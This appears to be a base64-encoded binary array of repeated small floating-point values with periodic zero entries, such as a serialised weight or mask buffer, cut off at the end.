tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8t